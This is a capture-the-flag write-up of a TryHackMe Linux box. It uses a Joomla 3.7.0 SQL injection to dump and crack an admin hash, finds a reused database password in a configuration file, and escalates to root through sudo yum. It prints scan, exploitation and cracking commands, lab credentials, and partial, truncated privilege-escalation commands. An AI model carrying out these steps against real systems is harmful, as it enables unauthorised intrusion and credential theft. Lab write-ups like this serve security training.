A hard Linux box from TryHackMe, use a SQLi in the particular joomla version to get access, finding a password to pivot, and then using GTFObins yum for root.


Starting with the default nmap scan

sudo nmap -sC -sV -oA nmap/dailybugle
Nmap scan report for  
Host is up (0.20s latency).  
Not shown: 998 closed tcp ports (reset)  
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)  
| ssh-hostkey:    
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)  
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)  
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)  
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)  
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40  
|_http-title: Home  
| http-robots.txt: 15 disallowed entries    
| /joomla/administrator/ /administrator/ /bin/ /cache/    
| /cli/ /components/ /includes/ /installation/ /language/    
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/

Find just the server thats interesting, from the default scripts it even found a joomla directory, so the server is likely running that

Running joomscan on the server, see that it is indeed running joomla version 3.7.0

joomscan -u

[+] Detecting Joomla Version  
[++] Joomla 3.7.0

A quick searchsploit on the version and it has a SQLi on one of it’s components, sweet

searchsploit joomla 3.7.0

---------------------------------------------------------------------------------- -----------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- -----------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                        | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                     | php/webapps/43488.txt
---------------------------------------------------------------------------------- -----------------------


Searching google for an exploit on github, find something called joomblah that given a URL, will dump the database

Running the script with

python exploit.py

Get the dumped SQL database in the form of a user (jonah), an email “jonah@tryhackme.com” and a bcrypt hash

[-] Fetching CSRF token  
[-] Testing SQLi  
 -  Found table: fb9j5_users  
 -  Extracting users from fb9j5_users  
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw  
.V.d3p12kBtZutm', '', '']

Using john to crack it

john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt --format=bcrypt

And find the password to be “spiderman123”

Now have a complete set of creds, jonah:spiderman123, which work for joomla admin access, but not for ssh

Looking into the configuration files on the site though, find a set of creds

public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'root';
        public $password = 'nv5uz9r3ZEDzVjNu';
        public $db = 'joomla';
        public $dbprefix = 'fb9j5_';
        public $live_site = '';
        public $secret = 'UAMBRWzHO3oFPmVC';
        public $gzip = '0';
        public $error_reporting = 'default';
        public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
        public $ftp_host = '';
        public $ftp_port = '21';
        public $ftp_user = '';
        public $ftp_pass = '';
        public $ftp_root = '';

The password “nv5uz9r3ZEDzVjNu” doesnt work for root, but it does work for the jjameson user!

Going through all the usual motions for privesc, run sudo -l and find that jjameson can run “yum” as root

sudo -l

Yum is a package manager, and can be used for root escalation by following GTFObins by running the following 4 commands to laod a custom program that just opens a shell using python

TF=$(mktemp -d)

cat >$TF/x<<EOF

cat >$TF/y.conf<<EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
def init_hook(conduit):

sudo yum -c $TF/x --enableplugin=y

And get root!